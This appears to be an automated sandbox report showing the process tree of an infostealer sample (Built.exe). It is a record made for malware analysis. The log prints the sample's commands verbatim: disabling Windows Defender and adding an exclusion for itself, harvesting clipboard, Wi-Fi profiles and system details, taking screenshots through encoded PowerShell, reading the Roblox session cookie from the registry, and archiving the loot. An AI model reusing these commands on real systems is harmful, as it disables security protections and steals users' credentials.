"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8cdf4dcf8,0x7ff8cdf4dd04,0x7ff8cdf4dd10
  2⤵
  PID:4704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2116,i,4390378600155990430,14628820654863060729,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2112 /prefetch:2
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1416,i,4390378600155990430,14628820654863060729,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2396 /prefetch:11
  2⤵
  PID:1304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2144,i,4390378600155990430,14628820654863060729,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2688 /prefetch:13
  2⤵
  PID:984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,4390378600155990430,14628820654863060729,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:4288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,4390378600155990430,14628820654863060729,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:4044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4160,i,4390378600155990430,14628820654863060729,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3792 /prefetch:9
  2⤵
  PID:396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4504,i,4390378600155990430,14628820654863060729,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4552 /prefetch:1
  2⤵
  PID:2104

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3040

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6192

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4004

C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
"C:\Users\Admin\Desktop\2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe"
1⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4884
- C:\Users\Admin\Desktop\Files\Built.exe
  "C:\Users\Admin\Desktop\Files\Built.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3144
- - C:\Users\Admin\Desktop\Files\Built.exe
    "C:\Users\Admin\Desktop\Files\Built.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:6696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\Built.exe'"
      4⤵
      PID:1596
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\Built.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:4996
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5244
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3672
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:5696
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:1660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:3804
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4612
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4924
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3160
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:4208
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:7140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:6020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5020
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\id4xakvr\id4xakvr.cmdline"
        6⤵
        
        PID:1548
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2074.tmp" "c:\Users\Admin\AppData\Local\Temp\id4xakvr\CSC4D78CF513924BB9A82E895058879F.TMP"
        7⤵
        
        PID:5656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6676
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6556
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2944
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4640
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2604
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4076"
      4⤵
      PID:4244
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4076
        5⤵
        Kills process with taskkill
        
        PID:712
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4704"
      4⤵
      PID:2424
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4704
        5⤵
        Kills process with taskkill
        
        PID:6452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 720"
      4⤵
      PID:5088
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 720
        5⤵
        Kills process with taskkill
        
        PID:1588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 300"
      4⤵
      PID:6832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 300
        5⤵
        Kills process with taskkill
        
        PID:4376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 412"
      4⤵
      PID:3700
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 412
        5⤵
        Kills process with taskkill
        
        PID:4520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 436"
      4⤵
      PID:5952
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 436
        5⤵
        Kills process with taskkill
        
        PID:3552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2164"
      4⤵
      PID:820
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2164
        5⤵
        Kills process with taskkill
        
        PID:1336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:7048
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:5000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:6796
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:5888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\NFElL.zip" *"
      4⤵
      PID:5208
    - - C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\NFElL.zip" *
        5⤵
        
        PID:1052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:2900
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6272
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:4584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:2188
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6404
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:5100
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
